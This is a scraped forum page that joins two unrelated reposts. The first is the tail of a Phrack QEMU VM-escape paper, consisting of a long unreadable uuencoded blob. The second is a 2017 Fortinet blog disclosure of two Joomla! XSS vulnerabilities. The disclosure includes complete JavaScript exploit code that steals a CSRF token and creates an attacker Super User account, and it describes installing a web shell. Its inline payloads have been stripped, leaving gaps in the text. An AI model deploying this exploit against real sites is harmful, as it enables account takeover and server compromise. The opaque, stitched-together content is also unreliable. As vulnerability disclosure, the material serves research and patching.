MH+5I.E1;&F:!9X5$L:3(3-^R?`:P$K<`BK/=<>*DKDVUI4421UY$%$O")(-^ M%`P0FG821FRN6YA>&+*A<.J;0."$1CVQS"2/;#94M@N_"-*0*..%?NBF%EL3 M6]"(+*913WS?MS,G(P`QN]G,5TPLFG!A9MMFDK)]<>99ILW\$%B)%7IAQ-;, MB9]X%E$F*I(B=V/J6QXF8>8ZS`]!:`9I%%-;S<(TBX@-KR/?C.(P9`MFR\RC MT&)^"`H_-F&4V"[:AY;:-+J1!5,QC:AON>\[7BKLHD4K"*N5^JEO^50;3&#/ M@=E!$]'V;=-TF1_\U/0C+R>L5F):L1=0;:%MA@60C`!@#%+78W[PO<3,HM1G MP_`DR",VG@Z3)$_"G"VLTP0X.F!^``)G5I8192POB^W,)8J%:>8$:4&C7B0P MAU.?^<'-$MNW/&JK$R-3IFR&[22I:0;4-V#6Q#%SY@<WSHK8<ZFM3I:%D9<1 M96+@D=3UV9(;6*]P"^8'U_$C$%HQF[7[>185*1MZ^T$8NFR8'OLF#)VP6'=- MU\X":JOCF`[,<!K=.#9C-_6H;UEF9D&:,C]XIND%ED-8[<"T72L6YN8F3%(V M-$\C,P4J,S]X@1\FGDU8;=,O0B^AVI+(]S/7)(JE()9S-V)^\/#%7V029>P( M1B2*B&(P.F84VC3J:9`%<9@(P_TH<9S,(LK8>>+";""*)4&2>:F3L*5]$OMI MS/P@A#>U-8J3(@%!11-1""P2TFYB97;$_)#'F0>;'6IKE&5V$,1$&5.,*`$X M&3!@R/R0.R`@$WY>$+F^ZR0A/SO(_,R/'>I;$/NQ%\?,#[EKYFEA4EM!WD1% M$;%M?FR:<6Y3WP)8)R)8.PA`,!EA#0,SC(&#:"+FI@5\0!3S(]-/;?$JH`A\ MVPL\PAJ:ON?#$D0`D9\ZL*,C@-Q/3#]G?BCRS+62@"@31IECPQ#S8X(L#J#E M!!!DF1NGS`]%E$09R"8"R),\ATX00``CD;L.*QH2,\PSY@=!#&IK;&56Y`1$ M&2?,PM1.J6]ND16%[3$_9%:2^$%!;8W])(6Y191QBL0S8=$C@#"Q'=]E?LA@ M,;)!UA)`8<8@FVET'=]TW+B@OKFPM86Q8'Z`]IMYD5);XQ"Z5W@TNH[EYV'. MCS!@(QPE><#\D":^E3@A84U2'R:`1;7!?J3([)@HYL%XY-`H!DC--`@BPIHD M9N(&)M4&DMBV_(0HYGDFP-C,#ZF7@(#@YQP)=,9,;**8G22N%T?\J"5-'!"H MS`\I,'11Q$29Q,M,$$5$,1N6DPC$-@$D61[G%O.#V)M06_/4=PK;)LH$GA_' M3D1],\5"R`"I"5,KIK;FB8FSG2@3V+"3"D)^-B,D!0-X2>'&(;4UA]4NB"T: MW2`!)DEBZILI2,D`=F:'>41MS;W,@[E'HQND69H7"?7-3+(D*VSF![&&$%;8 M1;FY[5)M?IAEB5,0Q:PBBT/'9WX(K22W8`M#`$!W&^0_`12)&00Y4<P*D\`- M`N8'7)>]."?*%(4)"UA`%/-]TP<!3J-NH0A,/.:'L/"]")B``$+?!EBB&"Q= M25%D-.H6[*+2PF5^$+Q.;<T"$P1-3I1Q<],-'7ZXY$0@I9R4^2$&:MN^3VV% M+8AIP<:``"(_<@.7^N;DP-!!QOP0YYGEQRZU-8/]D1=G-+H@,T'X^-0W)\A" M)RF8'^((>I9[XME3DL!>D$;7#1([+0+J&T@ZKRARY@<Q)H0UC9,XM4.JS8-6 M1[#"T$1T$S=V8E^\5LI,8$?"FF;0;3^BVCP7EJ+`)HK93A;Y0<+\`#/=#V*; MWSVYON7&"5',RWP84WX_9<=^82<1\P.L",`^#E$F=6`_FL=$,2\V80=HT:C# M'MS.BS!C8WGU<#$3/OQJ`UVI^6U;"P]'0T"KNRH<@[0?(3]_G/P2\;0=^I$[ MOTI?`(F5T7C5/*$0J*WNJRA.8W2HWR(ZE+3>T>`1=@ZMBU1U6IPTWUOBL`OJ M(K<4.?XCPJJCTB14/8EXFJE3E(S8R:I)VH&CDDH,G,%:@,]!0ET=-3U2GAJO MEG?(->1A$[&<7#0=40+$&:[K[1KBJZO%!PZ3Q4:/5(F"<T]TUL+.$AUZFU^] ML:#\4[56Q6R>^K5.N4+H17F=IGE9%M>+Q8?*]OU?K;7Y]3ZU_H^]G?P6=0SK M_TS8DY#^#_96I`'\7Z8%)PQGU/_]'A^IUZN4\LKE4JWO@D_LP1&X4@,V;Q-T MQ>W"4HISW.)&!<WB3AJKQ?%BN]F<9G$WRNOB>+>_I>UP`J^*4S3C5OE68VP% M.P7['<3N.D5=G,(;#V)W<Z6K&,!X&+N3*EYER/?X<&."M"Y>YHO6('6&*<_J MXA@G>0MV.%A7Q2E@\G!78P5[^:'<Y)=#C?&\0.EJ(\XR@[6PVPIENC=-3>QP MM';<0'&)I']FK>^)$X:%VC3M0^P>H@%LX/IZV$T'L@,;A:D>MO5*6@>;!78_ M;-@$;</"%EL/6SU`[6^S9UEZV+)1HQ86SJ&_?IM;#\ZUM#+SWX;.RE-U+6SF MUH)LZ!U[%S:`(Z<.5O-4MPOK*\[+!IZ_:]BT\'.K&("M'L=K89,X&H!MO@IO MPZ9..`#;>%/?J3=S0PWSE[I)V1HAQ]7,C%+'"6TVT+%NJ1,9;7FAS(F>5_H] M0BKQVA-"_XB_/1MB3Z'.+@_V.^151/'V!_B:Z1@6??`[L4(2I;]:_0.^`?J7 MAR+63*^N0X`>^,AT-")$[S&@RU5Y;A=./[A&ZK:G.+1^J/:VP&^!^[:6>"V? M!+W@H3<`KEDB6^!)I)EZ?9X--#,G[8`/.3WH3)S8^S.?!^OS'\7Z.<YOKA:K M^>9^^2N>!)%2@>?UV7_@[5#K_.>Y4'P\__T.G[]\]B"9+Q\D<7FQOX\6=?=N MZ,]QOK\_+XR7QO'_&'?N6G>,\_V]S46^1+.H]&(%::;QY56\N3C>K(YQ[WW, MKJT?WA$FUOO%?'^?TT[O6OO[Q?4R)3\?V;R,RY)4ACFE8+9`^ICR\LMD@3J? MNZ(`!D<W'A[8^WMHAWMZ=W+Y%@X25X?DI(1,<X\SX_A-5=ZX*]QL/S3N8K;` MSM]_5IHBRM..I=T@/'ODB\(X?FY4^#X:K]?YE7&_JNBC$;]_:WSQ$RF/C+ON MSU\T\7^X3$!V@C1:I82??A/ZJN5G;>QW7GUYEPN^>GBG78/5JB'[L(POY^E, MU%1UI*XHC0'L:K&IT/_%N#M1&V:(VJ``NN/^HGSPHSE]\."+0UWE=:&_WH4R MS=Z2%<VVII!E8*>K#_^ZM:OHWRTFQUTW\?IU:1Q_\]//PDV%<0==8=RU;NZ` M=/Z)GIQ`CV&B*(/8HC)3!#8T"^-X:5CMRNV?OS@4.'B^$@T/]['U=1I99*(/ M3YJ\0ZH4(+DRUPQ!!.Z28?F'=UHX=/H5J+8[VK6]YB`ZC?ZE!QV7W(*MJY[I MPX8E!Y'IE#=Z9%C2=P>1Z50[>F14<A"73N^CQT5N4(90Z71">E14<A"73F&D MQX4E!U'IE$EZ5%AR$)5.T:1'Q24'D>G44'ID6'(0E4Y%I4=%)8?[J-%?]?21 M2@[37J/=ZJ%]H^0@4IT.#"1/1RXW3:UU&#O-W:8MTU;3A1JFR3:UVO9*R+7K MSG7HU&_;Z]C<H@:=\FA[#374[6IJJ\=VJRF\744Z_=_VBA!J]SIT>L+M=91_ M2'KI=(^[5<10?]3)UM9K[E830PWO"+9I0;4U]4'M6I5>2[2MJB;4\*YIFY)5 M6Y<>ZI85M32R.U:$R;>KIZ4BW+&>"NJ6O6KI>W>L34+=;MG3ZHF'9WQY&XFD M52=OQ[^[5-6JG;=7L/MZJE5/;Z]@^ZY@6(\]Q*`=D)W&?"?M]PZ3K0/9K/U$ MW\UAI?50;_60MZKT]N)6"_D'[.A.*OWAV=J`U-?6RQP#]P#;*E4`=V/$@4N# MW>JJ`&]7GV;/MEM].PO)@0N)G7NVH[@<N+S8K:K=!>?`1<=N56TYC^QR)3+, M;AK`76H<O$49JK$'L$=Z_XDO7_X`G_K^Y[OX+0S?(O_UZ\!;G@'[/],,@M;] MCPLEQON?W^/SU=??/OK/YZ?'KXWCA=`T&<?E)CM-+<LX?CQ[_.3K1S]\BTYY M?CC[ZLG^?KQ8_-5X=WG,DV;DO3_[1Q/_&5C3_1WC/]N.[UEM_K?=8.3_W^,S MQG\>XS^/\9_'^,]C_.<Q_O,8_UGU=/.'"O;\Z9&<6\&*U0"TKAGYK6P1RY@^ M(J!Q5>+QV=]%.F[@ZN072G)-HV^?/GU6)=?FS(___MV+K[]ZSLFU-3=PZ+>R MM/+"Y/'95W][]@B3*92TFOR_OS+H>;&2#+S_'2/!"-@BSB?WJQ%8]^SQLSIX MY]DC\0,?/I\]?\$_7'ZNJ_-Z-#H]&IT>C4Z/1J='H],C`AB='HU.CT:G1Z/3 MH]'IT>CT:'1Z-#H]TC@]$J$.KM(E6WL5\]<RT+OE8ZSVRU66*ZYI#&.]R)>- MA$T[X3).7_KG)PJ6F=1&-\HMXFS],CQ7W>,8ZRI62)U6Q0_I-)CB.:C>=F0, MF*KY&!'E]>:"D[A:>@QS7<J0],U$NU'SY;S9%*4?W!8ZILD><9LX%,'+SI&^ M.K-Y+,=XE>1UQN9=#*7[+$=YO1\LQ)MGR%4;@T]D*"@'AB,>8SV/L9ZUL9X? M3%GYH@LIIT[C&;E:FJ7KM'9&)6,-=7R/#0;M&OV2_19^R4`:+C$.E!P3X9+L M2'HEJ_F(!;P2M$4G^:?\=W`DNP)XNDL<&@V8D.LT%41\,U%_-ZB:VDP.`\/? MCQ_B`@4#0#K-CZ1GY.A-2):J#&HU[KR"L]XKV(F^@IWI*SCKO;K)\U>PP:&( M`+(H+F^D9S25Q(TNL8XGI`^Q)GJGHAF&V-00W5#KJ8R_*(.,U934CFA?2$2. MD3<O9^LZDC8ME4FZ1&%ZW%FXT)$;YAV<TG:PD+\_TF_3-+?'5*R;1!&91&$E MB%VGTCJ,X5`HMW;(0U[LT>DB-%!(<NZJC!RZSM,<I)WPPU<:J_>HK$\^\&TI ML`>'$65T<D]`0Q^:,F1:5TI2M*/=R-_'([M&A.M2:GL\..XZ+I;/7SPSGGS_ MS'CT^#%J^I/YIM1VF,;6=@B4Y_[D6,:6P]_*7*#?RES8:X\%;0^Y"<5B?D4D M7Y<7\&VSZB?Y1TEST?CYZV6\D'&>"(#BD%9S1T;D>_1,!L"#S)NPG?WXV7#D MNX8X5'^HJY&:CN$]3EK@-/C\5;*\>C<T4'RM+RXFARPB1WE:U5'[AU0CY&WS M3KJIRI`$6*R.C(OY;QW538EW)EB[-V2:5BJTJ"!%`ZURT\-6K--/0;W9@KHK M>`\:@W=D=`;*JK%KX#9-."5:FGE85UA/MX8T["[L!VKYH]WC58E/JS.?"J\L M9A2<<R*GV:&&>RYP9]7I)FR?+%]$51/>0IL>3%$,\-Y-E<8G^VJD9O2U.WPP MPPU3VP4OQF.NQZRS%R:?I53T8K-:8FS0REVI#`.'EC!DA,72:@ZE&I((52[$ M/LOWS8RSYR\J'`!<OJ^CV)%0\SHRC46>D'BFA7H!C=!C,J*XE9L]B=$:0(@R M02=!*;-3D0)X,>]OQ7PYWY!]%-KW;>J&]`AST3.G!Z$:#["[*F_E,15$.]MU MHN(3HCF-G_$S?L;/^!D_XV?\C)_Q,W[&S_@9/^-G_(R?\3-^QD_]^7_T`TH, $`$`!```` ` end Sursa: http://phrack.org/papers/vm-escape-qemu-case-study.html
-
- 2
-
-
Multiple Joomla! Core XSS Vulnerabilities Are Discovered by Zhouyuan Yang | May 04, 2017 | Filed in: Security Research Joomla! is one of the world's most popular content management system (CMS) solutions. It enables users to build custom Web sites and powerful online applications. More than 3 percent of Web sites are running Joomla!, and it accounts for more than 9 percent of CMS market share. As of November 2016, Joomla! had been downloaded over 78 million times. Over 7,800 free and commercial extensions are also currently available from the official Joomla! Extension Directory, and more are available from other sources. This year, as a FortiGuard researcher I discovered and reported two Cross-Site Scripting (XSS) vulnerabilities in Joomla!. They are identified as CVE-2017-7985 and CVE-2017-7986. Joomla! patched them [1] [2] this week. These vulnerabilities affect Joomla! versions 1.5.0 through 3.6.5. They exist because these versions of Joomla! fail to sanitize malicious user input when users post or edit an article. Remote attacker could exploit them to run malicious code in victims’ browser, potentially allowing the attacker to gain control of the victim’s Joomla! account. If the victim has higher permission, like system administrator, the remote attacker could gain full control of the web server. In this blog, I will share the details of these vulnerabilities. Background Joomla! has its own XSS filters. For example, a user with post permission is not allowed to use full HTML elements. When this user posts an article with HTML attributes, Joomla! will sterilize dangerous code like “javascript:alert()”, “background:url()” and so on. Joomla! has two ways to achieve this sterilization. On the client side, it uses the editor called “TinyMCE.” On the server side, it sanitizes the request before storing it on the server. Analysis To demonstrate these vulnerabilities, the test account ‘yzy1’ is created. It has author permission, which is not allowed to use full HTML elements. To bypass the client side sterilization, the attacker can use a network intercept tool like Burp Suite or just change the default editor to other Joomla! built-in editors, like CoodeMirror or None, as shown in Figure 1. Figure 1. Bypassing the client side XSS filter On the server side, I found two ways to bypass the XSS filters. They are identified as CVE-2017-7985 and CVE-2017-7986. CVE-2017-7985 The Joomla! server side XSS filter sterilizes dangerous code and saves the safe characters. For example, when we post the following code with the test account, Joomla! sterilizes it by double quoting the , deleting the , and adding safe links to the URLs, as shown in Figure 2. Figure 2. Joomla! XSS filter But an attacker could take advantage of the filter by trying to let the filter to reconstruct the code and rebuild the scripts. For example, we can add the code Note that the double quote in is the CORRECT DOUBLE QUOTATION MARK, as shown in Figure 3. Figure 3. Inserting the PoC for CVE-2017-7985 When victims access the post, regardless of whether it’s published or not, the inserted XSS code will be triggered in both the main page and the administrator page, as shown in Figures 4 and 5. Figure 4. CVE-2017-7985 PoC triggered in the home page Figure 5. CVE-2017-7985 PoC triggered in the administrator page CVE-2017-7986 When posting an article, the attacker could bypass the XSS filter in an HTML tag by changing the script from to , because the is the mark “:” in HTML format. The attacker could then trigger this script code by adding a tag. For example, the attacker can insert the following code in an article , as shown in Figure 6. Figure 6. Insert the PoC for CVE-2017-7986 When victims access the post, regardless of whether it’s published or not, and click the “Click Me” button, the inserted XSS code will be triggered in both the main page and the administrator page, as shown in Figures 7 and 8. Figure 7. CVE-2017-7986 PoC triggered in home page Figure 8. CVE-2017-7986 PoC triggered in administrator page Exploit Here I provide an exploit example for CVE-2017-7986 that allows an attacker with a low permission account to create a Super User account and upload a web shell. To achieve this, I will write a small piece of JavaScript code for creating a Super User account by using the site administrator’s permission. It first obtains the CSRF token from the user edit page , and then posts the Super User account creation request to the server with the stolen CSRF token. The new Super User will be ‘Fortinet Yzy’ with the password ‘test’. var request = new XMLHttpRequest(); var req = new XMLHttpRequest(); var id = ''; var boundary = Math.random().toString().substr(2); var space = "-----------------------------"; request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true); request.onload = function() { if (request.status >= 200 && request.status < 400) { var resp = request.responseText; var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/; id = myRegex.exec(resp)[1]; req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true); req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary); var multipart = space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[name]\"" + "\r\n\r\nFortinet Yzy\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[username]\"" + "\r\n\r\nfortinetyzy\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[password]\"" + "\r\n\r\ntest\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[password2]\"" + "\r\n\r\ntest\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[email]\"" + "\r\n\r\nzyg@gmail.com\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[block]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[id]\"" + "\r\n\r\n0\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" + "\r\n\r\n8\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" + "\r\n\r\n\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"task\"" + "\r\n\r\nuser.apply\r\n" + space + boundary + "\r\nContent-Disposition: form-data; name=\"" + id + "\"" + "\r\n\r\n1\r\n" + space + boundary + "--\r\n"; req.onload = function() { if (req.status >= 200 && req.status < 400) { var resp = req.responseText; console.log(resp); } }; req.send(multipart); } }; request.send(); An attacker can add this code to Joomla! by exploiting this XSS vulnerability, as shown in Figure 9. Figure 9. Adding XSS code Once the site administrator triggers this XSS attack in the administrator page, a Super User account will be immediately created, as shown in Figures 10 and 11. Figure 10. Site administrator triggers the XSS attack in the administrator page Figure 11. A new Super User account is created by the attacker The attacker can then login to Joomla! using this new Super User permission and upload a web shell by installing a plugin, as shown in Figures 12 and 13. Figure 12. Uploading a web shell using the attacker’s Super User account Figure 13. Attacker accesses the web shell and executes commands Solution All users of Joomla! should upgrade to the latest version immediately. Additionally, organizations that have deployed Fortinet IPS solutions are already protected from these vulnerabilities with the signatures Joomla!.Core.Article.Post.Colon.Char.XSS and Joomla!.Core.Article.Post.Quote.Char.XSS. by Zhouyuan Yang | May 04, 2017 | Filed in: Security Research Sursa: https://blog.fortinet.com/2017/05/04/multiple-joomla-core-xss-vulnerabilities-are-discovered
-
- 1
-